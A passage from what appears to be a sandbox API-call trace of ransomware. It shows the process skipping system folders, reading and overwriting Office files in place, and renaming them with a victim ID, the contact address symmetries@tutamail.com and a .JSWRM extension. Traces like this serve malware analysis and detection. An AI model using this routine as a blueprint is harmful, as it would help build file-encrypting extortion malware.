RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0113.985] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GR8GALRY.GRA" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\gr8galry.gra"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.985] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=186880) returned 1 [0113.985] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0113.986] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0114.013] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.013] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0114.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0114.014] CloseHandle (hObject=0x238) returned 1 [0114.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0114.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0114.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0114.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0114.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0114.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0114.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0114.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0114.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0114.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0114.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.014] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GR8GALRY.GRA" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\gr8galry.gra"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GR8GALRY.GRA.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\gr8galry.gra.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0114.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0114.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0114.016] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4b3103f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4b3103f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9a2c10c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x94d80, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="GRAPH.HXS", cAlternateFileName="")) returned 1 [0114.016] lstrcmpiW (lpString1="GRAPH.HXS", lpString2=".") returned 1 [0114.016] lstrcmpiW (lpString1="GRAPH.HXS", lpString2="..") returned 1 [0114.016] lstrcmpiW (lpString1="GRAPH.HXS", lpString2="...") returned 1 [0114.016] lstrcmpiW (lpString1="GRAPH.HXS", lpString2="windows") returned -1 [0114.016] lstrcmpiW (lpString1="GRAPH.HXS", lpString2="recovery") returned -1 [0114.016] lstrcmpiW (lpString1="GRAPH.HXS", lpString2="perflogs") returned -1 [0114.016] lstrcmpiW (lpString1="GRAPH.HXS", lpString2="documents and settings") returned 1 [0114.016] lstrcmpiW (lpString1="GRAPH.HXS", lpString2="$RECYCLE.BIN") returned 1 [0114.016] lstrcmpiW (lpString1="GRAPH.HXS", lpString2="system volume information") returned -1 [0114.016] lstrcmpiW (lpString1="GRAPH.HXS", lpString2="msocache") returned -1 [0114.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0114.016] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRAPH.HXS", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.016] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRAPH.HXS", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRAPH.HXS", lpUsedDefaultChar=0x0) returned 9 [0114.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0114.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0114.016] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRAPH.HXS", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.016] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRAPH.HXS", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRAPH.HXS", lpUsedDefaultChar=0x0) returned 9 [0114.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0114.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0114.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0114.016] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.016] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0114.016] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GRAPH.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\graph.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.017] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=609664) returned 1 [0114.017] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0114.017] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0114.030] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.030] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0114.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0114.031] CloseHandle (hObject=0x238) returned 1 [0114.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0114.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0114.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0114.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0114.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0114.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0114.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0114.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0114.031] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GRAPH.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\graph.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GRAPH.HXS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\graph.hxs.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0114.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0114.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0114.033] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9a9e866, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9a9e866, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa3dba42, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x277, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="GRAPH_COL.HXC", cAlternateFileName="GRAPH_~1.HXC")) returned 1 [0114.033] lstrcmpiW (lpString1="GRAPH_COL.HXC", lpString2=".") returned 1 [0114.033] lstrcmpiW (lpString1="GRAPH_COL.HXC", lpString2="..") returned 1 [0114.033] lstrcmpiW (lpString1="GRAPH_COL.HXC", lpString2="...") returned 1 [0114.033] lstrcmpiW (lpString1="GRAPH_COL.HXC", lpString2="windows") returned -1 [0114.033] lstrcmpiW (lpString1="GRAPH_COL.HXC", lpString2="recovery") returned -1 [0114.033] lstrcmpiW (lpString1="GRAPH_COL.HXC", lpString2="perflogs") returned -1 [0114.033] lstrcmpiW (lpString1="GRAPH_COL.HXC", lpString2="documents and settings") returned 1 [0114.033] lstrcmpiW (lpString1="GRAPH_COL.HXC", lpString2="$RECYCLE.BIN") returned 1 [0114.033] lstrcmpiW (lpString1="GRAPH_COL.HXC", lpString2="system volume information") returned -1 [0114.033] lstrcmpiW (lpString1="GRAPH_COL.HXC", lpString2="msocache") returned -1 [0114.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0114.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRAPH_COL.HXC", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0114.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRAPH_COL.HXC", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRAPH_COL.HXC", lpUsedDefaultChar=0x0) returned 13 [0114.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0114.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0114.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRAPH_COL.HXC", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0114.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRAPH_COL.HXC", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRAPH_COL.HXC", lpUsedDefaultChar=0x0) returned 13 [0114.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0114.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0114.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0114.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0114.033] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GRAPH_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\graph_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.034] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=631) returned 1 [0114.034] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x270) returned 0x20b1f8 [0114.034] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x270, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x270, lpOverlapped=0x0) returned 1 [0114.035] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.035] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x270, lpOverlapped=0x0) returned 1 [0114.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0114.036] CloseHandle (hObject=0x238) returned 1 [0114.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0114.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0114.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0114.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0114.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0114.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0114.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0114.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0114.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0114.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0114.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0114.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0114.036] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GRAPH_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\graph_col.hxc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GRAPH_COL.HXC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\graph_col.hxc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0114.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0114.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0114.037] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9a05f3c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9a05f3c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9a2c10c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcd, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="GRAPH_COL.HXT", cAlternateFileName="GRAPH_~1.HXT")) returned 1 [0114.037] lstrcmpiW (lpString1="GRAPH_COL.HXT", lpString2=".") returned 1 [0114.037] lstrcmpiW (lpString1="GRAPH_COL.HXT", lpString2="..") returned 1 [0114.037] lstrcmpiW (lpString1="GRAPH_COL.HXT", lpString2="...") returned 1 [0114.037] lstrcmpiW (lpString1="GRAPH_COL.HXT", lpString2="windows") returned -1 [0114.037] lstrcmpiW (lpString1="GRAPH_COL.HXT", lpString2="recovery") returned -1 [0114.037] lstrcmpiW (lpString1="GRAPH_COL.HXT", lpString2="perflogs") returned -1 [0114.037] lstrcmpiW (lpString1="GRAPH_COL.HXT", lpString2="documents and settings") returned 1 [0114.037] lstrcmpiW (lpString1="GRAPH_COL.HXT", lpString2="$RECYCLE.BIN") returned 1 [0114.037] lstrcmpiW (lpString1="GRAPH_COL.HXT", lpString2="system volume information") returned -1 [0114.037] lstrcmpiW (lpString1="GRAPH_COL.HXT", lpString2="msocache") returned -1 [0114.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0114.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRAPH_COL.HXT", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0114.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRAPH_COL.HXT", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRAPH_COL.HXT", lpUsedDefaultChar=0x0) returned 13 [0114.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0114.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0114.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRAPH_COL.HXT", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0114.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRAPH_COL.HXT", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRAPH_COL.HXT", lpUsedDefaultChar=0x0) returned 13 [0114.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0114.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0114.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0114.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0114.038] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GRAPH_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\graph_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.038] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=205) returned 1 [0114.039] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0114.039] ReadFile (in: hFile=0x238, lpBuffer=0x24b510, nNumberOfBytesToRead=0xc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24b510*, lpNumberOfBytesRead=0x345e89c*=0xc0, lpOverlapped=0x0) returned 1 [0114.072] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.072] WriteFile (in: hFile=0x238, lpBuffer=0x24b510*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24b510*, lpNumberOfBytesWritten=0x345e898*=0xc0, lpOverlapped=0x0) returned 1 [0114.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0114.072] 